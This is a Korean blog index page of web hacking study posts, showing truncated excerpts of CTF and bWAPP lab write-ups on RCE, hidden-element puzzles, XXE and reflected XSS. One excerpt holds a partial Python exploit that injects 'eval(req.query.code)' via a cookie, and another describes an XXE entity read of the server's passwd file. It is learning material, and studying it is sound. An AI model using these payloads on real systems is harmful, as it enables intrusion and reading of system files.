목록Web Hacking (14)
Information Security Study

yeeclass 문제 페이지다. yeeclass 테이블 구성을 알 수 있다. index 페이지의 html 코드이다.

RCE 문제 메인 화면이다 RCE 버튼이 한번 눌리기만 할뿐 별다른 동작을 하지 않는다. import requests import sys import binascii from urllib import parse if name == "main": payload = binascii.hexlify('eval(req.query.code)'.encode()).decode().lower() assert len(payload) == 40 target = sys.argv[1] url = f"http://{target}" resp = requests.get(f"{url}/") cur = resp.cookies['code'] for c in payload: while True: resp = requests.get(f"{u..

문제 페이지에 들어가면 보이는 화면이다. 패스워드를 입력하면 플래그를 얻을 수 있는 것 같다. 우선 패스워드 입력란에 아무거나 입력했더니 경고창으로 틀렸다고 뜬다. 숨긴 영역들을 발견했다! 이 영역들을 잘 접근하면 플래그를 얻을 수 있을 것 같다. 숨어진 영역들에 해당하는 코드다. id가 go인 부분을 클릭해 보았지만 아무 반응 없었다. 개발자 도구 콘솔창을 이리저리 입력해 본 결과이다. 콘솔 다루는 법이 어려워 공부를 조금 더 해야 할 것 같다.

문제에 들어가는 보이는 페이지이다. 이 웹사이트의 취약점을 찾는 것이 목표이다. 우선 아무렇게나 값을 넣어 로그인해 보았다. username과 password가 유효하지 않다고 뜬다. 개발자도구로 html을 살펴보았다. head에서 어떠한 링크를 발견했다! 들어가보니 이런... cs 코드?를 볼 수 있었다. 에러 메시지 페이지의 html 코드를 볼 수 있었다. 그런데 로그인을 성공했을 때의 코드는 찾을 수가 없었다...

문제 페이지를 들어가니 이러한 화면을 볼 수 있었다. 다른 파이썬 파일이나 문제에 대한 정보도 없었다. 그래서 개발자 도구, 검사를 이용해 살펴보았다. 각 div에 before, after를 발견했다. before와 after 영역이 따로 잡혀있는 것을 보니 플래그를 찾으면 이미지가 변할 것이라 추측했다.. eyes 영역뿐만 아니라 모자, 수염에도 before, after가 존재했다. html에서 url을 발견했다. url에 접속해보니 어떤 파일이 다운받아졌다. 하지만 파일이 열리지는 않았다... 별다른 변화를 찾지 못했다... 보통 이런 문제는 콘솔에서 입력해서 플래그를 얻던데 어떻게 접근할지 감이 잡히지 않았다.

XML 외부 엔티티 공격은 SYSTEM 키워드를 사용한다. SYSTEM 키워드로 XML 파서를 발생하게 하면 페이지의 내용을 대체하는 권한이 생긴다 => 공격자는 XML 파서로 서버 시스템에 접근 가능! xxe-1.php 실습 페이지다. burp suite로 실습 페이지의 패킷을 가로챘다. &bWAPP;blash repeater로 요청을 보내 위 xml코드를 입력 후 send 해주었다. send 후 요청, 응답 중 한 패널에서 'show response in browser' 메뉴를 클릭하면 URL을 볼 수 있다. 이 URL을 복사해 웹브라우저에 입력했더니 passwd 파일 안에 있는 내용을 웹 브라우저에 출력할 수 있었다. 이 xxe-2.php 페이지는 직접 접근이 불가능한 페이지지만 서버의 계정 정보를..

'반사된 XSS'는 웹 페이지 URL에 존재하는 파라미터에 악의적인 스크립트 코드를 입력해 사용자가 URL을 클릭하면 파라미터에 입력한 악성 스크립트 코드가 실행되게 하는 공격이다. 스크립트 코드가 포함된 URL을 사용자가 클릭하도록 유도해 공격한다. 이 취약점은 사용자들이 알아내기 쉽다 또한 일부 브라우저에서 악의적인 스크립트에 대응하고 있어 저장된 XSS보다 위협이 적다 1) 스크립트 코드가 포함된 URL을 메일로 전송 또는 게시물로 등록 2) 사용자가 URL을 클릭하면 악성 스크립트 코드가 실행된다 실습 페이지에 XSS 취약점이 있는지 알아보기 위해 First name 입력란에 위의 스크립트 코드를 입력해주었다. Last name 입력란에는 아무 값을 넣어주었고 로그인을 하면 'Succeed' 메시..